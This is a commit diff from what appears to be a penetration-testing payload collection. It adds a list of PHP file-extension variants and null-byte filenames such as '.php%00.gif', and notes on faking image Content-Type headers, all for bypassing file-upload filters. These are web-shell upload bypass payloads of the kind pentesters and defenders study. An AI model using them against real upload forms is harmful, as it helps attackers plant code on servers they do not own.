PrivEsc - sudoers + Upload PHP

2025-10-29 16:57:02 +00:00 · 2019-09-02 12:36:40 +02:00
parent 3ca07aeb7a
commit 2b1900e046
5 changed files with 36 additions and 6 deletions
--- a/PHP/extensions.lst
+++ b/PHP/extensions.lst
@@ -0,0 +1,20 @@
+.jpeg.php
+.jpg.php
+.png.php
+.php
+.php3
+.php4
+.php5
+.php7
+.pht
+.phar
+.phpt
+.pgif
+.phtml
+.phtm
+.php%00.gif
+.php\x00.gif
+.php%00.png
+.php\x00.png
+.php%00.jpg
+.php\x00.jpg
--- a/Files/README.md
+++ b/Files/README.md
@@ -54,8 +54,17 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm

 ### Upload tricks

- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()`
+- Null byte (works well against `pathinfo()`)
+    * .php%00.gif
+    * .php\x00.gif
+    * .php%00.png
+    * .php\x00.png
+    * .php%00.jpg
+    * .php\x00.jpg
 - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
+    * `Content-Type : image/gif`
+    * `Content-Type : image/png`
+    * `Content-Type : image/jpeg`

 ### Picture upload with LFI